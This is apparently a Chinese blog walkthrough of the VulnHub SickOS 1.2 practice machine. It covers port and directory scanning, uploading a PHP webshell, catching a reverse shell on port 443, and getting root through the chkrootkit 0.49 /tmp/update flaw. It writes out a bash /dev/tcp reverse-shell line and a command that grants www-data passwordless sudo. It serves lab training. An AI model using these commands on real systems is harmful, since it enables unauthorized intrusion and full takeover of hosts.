vulnhub靶场-sickos1.2

vulnhub靶场–靶场

信息收集

主机发现

ipconfig查看kali IP
在这里插入图片描述

端口扫描

nmap 192.168.17.0/24
在这里插入图片描述

目录扫描

dirsearch -u http://192.168.17.136:80
在这里插入图片描述
dirb http://192.168.17.136
在这里插入图片描述
可以访问的目录有

http://192.168.17.136/test/
http://192.168.17.136/index.php

渗透攻击

在http://192.168.17.136/test/目录页面抓包发现可以使用POST方式
在这里插入图片描述
上传一句话木马试试
在这里插入图片描述
在这里插入图片描述
蚁剑连接
在这里插入图片描述
上传一个大马
在这里插入图片描述
在这里插入图片描述
然后监听9955端口然后nc监听访问nc -vnlp 9955
在这里插入图片描述
WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)
防火墙过滤规则本地端口只允许22和80,外来端口只允许8080和443,用来保证对外部https服务的正常访问,这里需要将端口改为443端口就可以直接接到shell啦。
在这里插入图片描述

后渗透攻击

接到反弹shell后第一件事是获取一个完整交互终端

python -c "import pty;pty.spawn('/bin/bash');"

上面的代码只是获取一个可交互的一个终端但是它不可以使用上下键去翻看之前的执行的代码。
在这里插入图片描述
我之前也一直是使用的上面的那个交互终端,也慢慢的习惯啦但是这个终端是一个完整的交互终端及其好用呀
在这里插入图片描述
sudo -l 查看一下sudo执行文件
在这里插入图片描述
还不知道密码
那就查看一下suid执行文件
find / -perm -u=s -type f 2>/dev/null
没有什么特别的
查看计划任务
find / -name cron* 2>/dev/null
在这里插入图片描述
查看下每日任务,发现运行着一个rootkit后门检测工具
在这里插入图片描述
查看版本
在这里插入图片描述
searchsploit chkrootkit 0.49
在这里插入图片描述
查看存在漏洞
在这里插入图片描述
意思就是/tmp/update下的文件会以root权限定期执行
这里就有两个骚方法啦一个是写bashshell弹到我们监听的端口上或者就是将www-date添加到sudo组
echo ‘chmod +w /etc/sudoers && echo “www-data ALL=(ALL) NOPASSWD:ALL” > /etc/sudoers’ > /tmp/update
在这里插入图片描述
在这里插入图片描述
另一种方法
根据exp的描述是目标靶机的Chkrootkit会周期性以root身份执行目录/tmp/update的文件,所以创建一个shell脚本

printf '#!/bin/bash\nbash -i >& /dev/tcp/192.168.17.128/8080 0>&1\n' > /tmp/update

然后监听8080端口
就是root权限啦

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值